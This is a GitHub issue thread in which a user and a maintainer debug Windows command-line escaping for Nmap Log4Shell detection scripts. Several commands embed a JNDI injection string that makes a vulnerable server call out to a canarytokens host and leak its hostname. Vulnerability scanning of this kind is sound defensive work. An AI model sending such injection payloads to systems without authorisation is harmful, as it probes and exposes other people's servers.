Open maxdemajo opened 2 years ago
kost
commented
2 years ago Hello!
Thanks for reporting. Since it is windows. You should use following escaping:
.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell,smtp-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}\"" -T4 -n -p80 --script-timeout=1m 10.0.0.1
According to: https://nmap.org/book/nse-usage.html#nse-args
Let me know if it works for you!
kost-div
commented
2 years ago Managed to work for you?
maxdemajo
commented
2 years ago Hello!
Thanks for reporting. Since it is windows. You should use following escaping:
.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell,smtp-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}\"" -T4 -n -p80 --script-timeout=1m 10.0.0.1According to: https://nmap.org/book/nse-usage.html#nse-args
Let me know if it works for you!
Thanks for your response :)
Nmap complains if you don't add ticks (`) before the curly brackets, so I added them and was able to begin the scan. I am getting a new error but haven't looked into it properly yet:
Unable to split netmask from target expression: "${jndi:ldap://x${hostName}.L4J.XXXXXXXXXXXX.canarytokens.com/a}\"
kost-div
commented
2 years ago Usually that means escaping was not good. Add -d to the command line, so you can check how it interpreted those script-args, so you got that error message.
Have you tried with the basic scan?
cd nse-log4shell
nmap.exe -sV -T4 -v --script=%cd%/ scanme.nmap.org
Running Nmap on Windows:
.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}"' -T4 -n -p80 --script-timeout=1m 10.0.0.1I get the following error:
Scripts are in the same directory as nmap. Any ideas?